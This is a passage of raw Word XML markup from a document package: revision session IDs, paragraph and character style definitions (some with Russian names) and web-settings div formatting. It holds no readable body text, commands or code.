    <w:rsid w:val="002407D8"/>
    <w:rsid w:val="002510B4"/>
    <w:rsid w:val="00264D42"/>
    <w:rsid w:val="0027327E"/>
    <w:rsid w:val="00277DCB"/>
    <w:rsid w:val="00290DD9"/>
    <w:rsid w:val="00291342"/>
    <w:rsid w:val="002926C9"/>
    <w:rsid w:val="002A4219"/>
    <w:rsid w:val="002A48B6"/>
    <w:rsid w:val="002B6CA7"/>
    <w:rsid w:val="002C2095"/>
    <w:rsid w:val="002C385A"/>
    <w:rsid w:val="002C4CF1"/>
    <w:rsid w:val="002C71B6"/>
    <w:rsid w:val="002C7B42"/>
    <w:rsid w:val="002D7F39"/>
    <w:rsid w:val="002E0A68"/>
    <w:rsid w:val="00301693"/>
    <w:rsid w:val="00306034"/>
    <w:rsid w:val="00317A2F"/>
    <w:rsid w:val="00322151"/>
    <w:rsid w:val="003353E4"/>
    <w:rsid w:val="0034371C"/>
    <w:rsid w:val="00347079"/>
    <w:rsid w:val="00354B8E"/>
    <w:rsid w:val="003654EA"/>
    <w:rsid w:val="003665AA"/>
    <w:rsid w:val="00370BC8"/>
    <w:rsid w:val="0039677A"/>
    <w:rsid w:val="003A515D"/>
    <w:rsid w:val="003B1235"/>
    <w:rsid w:val="003B32C2"/>
    <w:rsid w:val="003B7814"/>
    <w:rsid w:val="003C3BF9"/>
    <w:rsid w:val="003E5B4F"/>
    <w:rsid w:val="003E6B06"/>
    <w:rsid w:val="003F3D0F"/>
    <w:rsid w:val="00401E79"/>
    <w:rsid w:val="00412520"/>
    <w:rsid w:val="00417CBE"/>
    <w:rsid w:val="00423C8F"/>
    <w:rsid w:val="00431DC3"/>
    <w:rsid w:val="004325F4"/>
    <w:rsid w:val="004328E5"/>
    <w:rsid w:val="00451212"/>
    <w:rsid w:val="0046706C"/>
    <w:rsid w:val="004936B0"/>
    <w:rsid w:val="004A6E9B"/>
    <w:rsid w:val="004D6608"/>
    <w:rsid w:val="004D7FCD"/>
    <w:rsid w:val="004E6BC2"/>
    <w:rsid w:val="004F5EBE"/>
    <w:rsid w:val="005001B9"/>
    <w:rsid w:val="005216DB"/>
    <w:rsid w:val="00523F7D"/>
    <w:rsid w:val="005243F3"/>
    <w:rsid w:val="005359E8"/>
    <w:rsid w:val="00543C05"/>
    <w:rsid w:val="00546C81"/>
    <w:rsid w:val="00546FBD"/>
    <w:rsid w:val="00565E42"/>
    <w:rsid w:val="005678D0"/>
    <w:rsid w:val="00576652"/>
    <w:rsid w:val="00594000"/>
    <w:rsid w:val="005D6B28"/>
    <w:rsid w:val="005F5687"/>
    <w:rsid w:val="005F5A08"/>
    <w:rsid w:val="006012B7"/>
    <w:rsid w:val="00611C15"/>
    <w:rsid w:val="00617BD0"/>
    <w:rsid w:val="00634D28"/>
    <w:rsid w:val="00651CE6"/>
    <w:rsid w:val="00670F38"/>
    <w:rsid w:val="00671BB3"/>
    <w:rsid w:val="00671EE4"/>
    <w:rsid w:val="00673E72"/>
    <w:rsid w:val="00680A21"/>
    <w:rsid w:val="006A740F"/>
    <w:rsid w:val="006C445E"/>
    <w:rsid w:val="006C7B5F"/>
    <w:rsid w:val="006D3775"/>
    <w:rsid w:val="006D3DB3"/>
    <w:rsid w:val="006E58DC"/>
    <w:rsid w:val="0071081A"/>
    <w:rsid w:val="007336D8"/>
    <w:rsid w:val="00742A82"/>
    <w:rsid w:val="0074611C"/>
    <w:rsid w:val="00753818"/>
    <w:rsid w:val="00776A25"/>
    <w:rsid w:val="00782588"/>
    <w:rsid w:val="007A3298"/>
    <w:rsid w:val="007A32FA"/>
    <w:rsid w:val="007C086F"/>
    <w:rsid w:val="007C78D1"/>
    <w:rsid w:val="007E142F"/>
    <w:rsid w:val="007E3794"/>
    <w:rsid w:val="007F318C"/>
    <w:rsid w:val="007F4F6A"/>
    <w:rsid w:val="00800878"/>
    <w:rsid w:val="008055C3"/>
    <w:rsid w:val="00830953"/>
    <w:rsid w:val="008322CE"/>
    <w:rsid w:val="00857179"/>
    <w:rsid w:val="00865DCA"/>
    <w:rsid w:val="008816D2"/>
    <w:rsid w:val="008A325B"/>
    <w:rsid w:val="008A531B"/>
    <w:rsid w:val="008A6796"/>
    <w:rsid w:val="008B701A"/>
    <w:rsid w:val="008C47B1"/>
    <w:rsid w:val="008E2951"/>
    <w:rsid w:val="008E2C84"/>
    <w:rsid w:val="008E36F8"/>
    <w:rsid w:val="008E55BC"/>
    <w:rsid w:val="008F0DAD"/>
    <w:rsid w:val="009148D6"/>
    <w:rsid w:val="00920FAE"/>
    <w:rsid w:val="0093054C"/>
    <w:rsid w:val="00930593"/>
    <w:rsid w:val="009332E1"/>
    <w:rsid w:val="00937BB9"/>
    <w:rsid w:val="00950EF9"/>
    <w:rsid w:val="0096090C"/>
    <w:rsid w:val="0096766A"/>
    <w:rsid w:val="00973366"/>
    <w:rsid w:val="0097556D"/>
    <w:rsid w:val="009815CD"/>
    <w:rsid w:val="009A31ED"/>
    <w:rsid w:val="009B2356"/>
    <w:rsid w:val="009B366E"/>
    <w:rsid w:val="009B66DE"/>
    <w:rsid w:val="009B74C2"/>
    <w:rsid w:val="009D473D"/>
    <w:rsid w:val="009F0170"/>
    <w:rsid w:val="009F558E"/>
    <w:rsid w:val="00A02D75"/>
    <w:rsid w:val="00A1439B"/>
    <w:rsid w:val="00A30F3A"/>
    <w:rsid w:val="00A455ED"/>
    <w:rsid w:val="00A5429B"/>
    <w:rsid w:val="00A852C0"/>
    <w:rsid w:val="00A91198"/>
    <w:rsid w:val="00A91F54"/>
    <w:rsid w:val="00A92A4F"/>
    <w:rsid w:val="00AB2160"/>
    <w:rsid w:val="00AB5BFF"/>
    <w:rsid w:val="00AC3A96"/>
    <w:rsid w:val="00AC3FC3"/>
    <w:rsid w:val="00AD04F4"/>
    <w:rsid w:val="00AD3834"/>
    <w:rsid w:val="00AD6EEA"/>
    <w:rsid w:val="00AE219B"/>
    <w:rsid w:val="00AF3055"/>
    <w:rsid w:val="00B13E25"/>
    <w:rsid w:val="00B177A9"/>
    <w:rsid w:val="00B53B61"/>
    <w:rsid w:val="00B5780C"/>
    <w:rsid w:val="00B60516"/>
    <w:rsid w:val="00B73CCD"/>
    <w:rsid w:val="00B82224"/>
    <w:rsid w:val="00B93410"/>
    <w:rsid w:val="00B97D9A"/>
    <w:rsid w:val="00BB019C"/>
    <w:rsid w:val="00BD26D7"/>
    <w:rsid w:val="00BD45DC"/>
    <w:rsid w:val="00BF120D"/>
    <w:rsid w:val="00BF7C2C"/>
    <w:rsid w:val="00C0360F"/>
    <w:rsid w:val="00C17C3D"/>
    <w:rsid w:val="00C25028"/>
    <w:rsid w:val="00C250C0"/>
    <w:rsid w:val="00C31ABD"/>
    <w:rsid w:val="00C3573A"/>
    <w:rsid w:val="00C82EC8"/>
    <w:rsid w:val="00CB63D1"/>
    <w:rsid w:val="00D117CB"/>
    <w:rsid w:val="00D11F44"/>
    <w:rsid w:val="00D21A0A"/>
    <w:rsid w:val="00D26CBB"/>
    <w:rsid w:val="00D3591E"/>
    <w:rsid w:val="00D37F9B"/>
    <w:rsid w:val="00D42262"/>
    <w:rsid w:val="00D73001"/>
    <w:rsid w:val="00D93C92"/>
    <w:rsid w:val="00D94490"/>
    <w:rsid w:val="00DD518C"/>
    <w:rsid w:val="00DE3C27"/>
    <w:rsid w:val="00DE4481"/>
    <w:rsid w:val="00DF2EA2"/>
    <w:rsid w:val="00DF708C"/>
    <w:rsid w:val="00E12733"/>
    <w:rsid w:val="00E12945"/>
    <w:rsid w:val="00E17E00"/>
    <w:rsid w:val="00E25A3F"/>
    <w:rsid w:val="00E2666F"/>
    <w:rsid w:val="00E27B80"/>
    <w:rsid w:val="00E62392"/>
    <w:rsid w:val="00E737A5"/>
    <w:rsid w:val="00EA1778"/>
    <w:rsid w:val="00EB18EE"/>
    <w:rsid w:val="00EB5DBA"/>
    <w:rsid w:val="00ED40D4"/>
    <w:rsid w:val="00EE02CA"/>
    <w:rsid w:val="00F06FEA"/>
    <w:rsid w:val="00F0712A"/>
    <w:rsid w:val="00F21467"/>
    <w:rsid w:val="00F32B80"/>
    <w:rsid w:val="00F54FFF"/>
    <w:rsid w:val="00F61FB8"/>
    <w:rsid w:val="00F84B90"/>
    <w:rsid w:val="00F8771A"/>
    <w:rsid w:val="00FA3BFA"/>
    <w:rsid w:val="00FA7AED"/>
    <w:rsid w:val="00FB6D02"/>
    <w:rsid w:val="00FC4D17"/>
    <w:rsid w:val="00FD44B3"/>
    <w:rsid w:val="00FF24A8"/>
    <w:rsid w:val="00FF7D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D35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78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3F3"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="apple-converted-space">
    <w:name w:val="apple-converted-space"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00D26CBB"/>
  </w:style>
  <w:style w:type="character" w:styleId="a4">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00D26CBB"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a5">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="005678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6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78D0"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:eastAsia="ru-RU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="a6">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="005678D0"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="HTML1">
    <w:name w:val="HTML Variable"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="005678D0"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="20">
    <w:name w:val="Заголовок 2 Знак"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="2"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="005678D0"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="36"/>
      <w:szCs w:val="36"/>
      <w:lang w:eastAsia="ru-RU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-keyword">
    <w:name w:val="hljs-keyword"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="009D473D"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-string">
    <w:name w:val="hljs-string"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="009D473D"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-comment">
    <w:name w:val="hljs-comment"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="009D473D"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="10">
    <w:name w:val="Заголовок 1 Знак"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="1"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00D3591E"/>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rsid w:val="00D3591E"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      <w:ind w:firstLine="709"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:sz w:val="28"/>
      <w:szCs w:val="20"/>
      <w:lang w:eastAsia="ru-RU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="a8">
    <w:name w:val="Основной текст Знак"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="a7"/>
    <w:rsid w:val="00D3591E"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:sz w:val="28"/>
      <w:szCs w:val="20"/>
      <w:lang w:eastAsia="ru-RU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a9">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="aa"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00546FB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46FBD"/>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ab">
    <w:name w:val="TOC Heading"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="a"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00C0360F"/>
    <w:pPr>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="21">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00C0360F"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="220"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="11">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00C0360F"/>
    <w:pPr>
      <w:spacing w:after="100"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="3">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00C0360F"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="440"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ac">
    <w:name w:val="footnote text"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="ad"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="004936B0"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ad">
    <w:name w:val="Текст сноски Знак"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="ac"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="004936B0"/>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="ae">
    <w:name w:val="footnote reference"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="004936B0"/>
    <w:rPr>
      <w:vertAlign w:val="superscript"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="af">
    <w:name w:val="header"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="af0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="002C4CF1"/>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2C4CF1"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="af1">
    <w:name w:val="footer"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="af2"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="002C4CF1"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4677"/>
        <w:tab w:val="right" w:pos="9355"/>
      </w:tabs>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="af2">
    <w:name w:val="Нижний колонтитул Знак"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="af1"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="002C4CF1"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="parameter">
    <w:name w:val="parameter"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00B97D9A"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="sentence">
    <w:name w:val="sentence"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00B97D9A"/>
  </w:style>
  <w:style w:type="character" w:styleId="af3">
    <w:name w:val="annotation reference"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A92A4F"/>
    <w:rPr>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="af4">
    <w:name w:val="annotation text"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="af5"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A92A4F"/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="af5">
    <w:name w:val="Текст примечания Знак"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="af4"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00A92A4F"/>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="af6">
    <w:name w:val="annotation subject"/>
    <w:basedOn w:val="af4"/>
    <w:next w:val="af4"/>
    <w:link w:val="af7"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A92A4F"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="af7">
    <w:name w:val="Тема примечания Знак"/>
    <w:basedOn w:val="af5"/>
    <w:link w:val="af6"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00A92A4F"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
</w:styles>
</file>

<file path=word/webSettings.xml><?xml version="1.0" encoding="utf-8"?>
<w:webSettings xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">
  <w:divs>
    <w:div w:id="51202743">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="168260187">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="212623785">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="282689462">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="285546169">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="319046813">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="354574045">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="452745700">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="588348127">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="646473817">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="694309867">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="739451081">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="794451439">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1018853973">
          <w:marLeft w:val="408"/>
          <w:marRight w:val="136"/>
          <w:marTop w:val="217"/>
          <w:marBottom w:val="217"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="755636717">
          <w:marLeft w:val="408"/>
          <w:marRight w:val="136"/>
          <w:marTop w:val="217"/>
          <w:marBottom w:val="217"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="813643439">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="975338482">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1002008132">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1058675871">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
